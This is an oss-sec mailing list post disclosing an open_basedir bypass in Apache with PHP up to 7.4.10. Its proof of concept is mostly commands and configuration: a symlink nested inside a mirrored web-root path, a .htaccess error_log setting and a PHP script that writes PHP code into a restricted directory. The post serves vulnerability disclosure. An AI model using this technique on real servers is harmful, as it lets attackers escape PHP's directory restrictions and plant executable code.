oss-sec mailing list archives

Apache + PHP <= 7.4.10 open_basedir bypass

From: Havijoori <havijoori () protonmail com>
Date: Thu, 17 Sep 2020 02:41:22 +0000

Introduction
============
open_basedir security feature can be bypassed when Apache web server runs PHP scripts.

Proof of Concept
================
1. Set open_basedir as a security feature in php.ini file :
   open_basedir = /var/www/html:/tmp
2. Make a directory with the name of your web server's home directory inside your web server's home directory :
   mkdir -p /var/www/html/var/www/html
3. Make a symlink to a restricted writable directory inside this new directory :
   ln -s /home/havijoori/www/uploads /var/www/html/var/www/html/test
4. Make a .htaccess file in your web server's root directory to set php value :
   php_value error_log "var/www/html/test/hacked.php"
5. Make a PHP script, "bypass.php" in your web server's root directory to exploit the vulnerability :
   <?php error_log("<?php phpinfo(); ?>"); ?>
6. Call the script :
   curl http://webserver/bypass.php
7. After successful exploitation, our file "hacked.php" should be created in the restricted directory :
   ls /home/havijoori/www/uploads/hacked.php

Tested with PHP 5.2.5 and 7.x.
Similar to CVE-2007-3378.

Current thread:

Apache + PHP <= 7.4.10 open_basedir bypass Havijoori (Sep 17)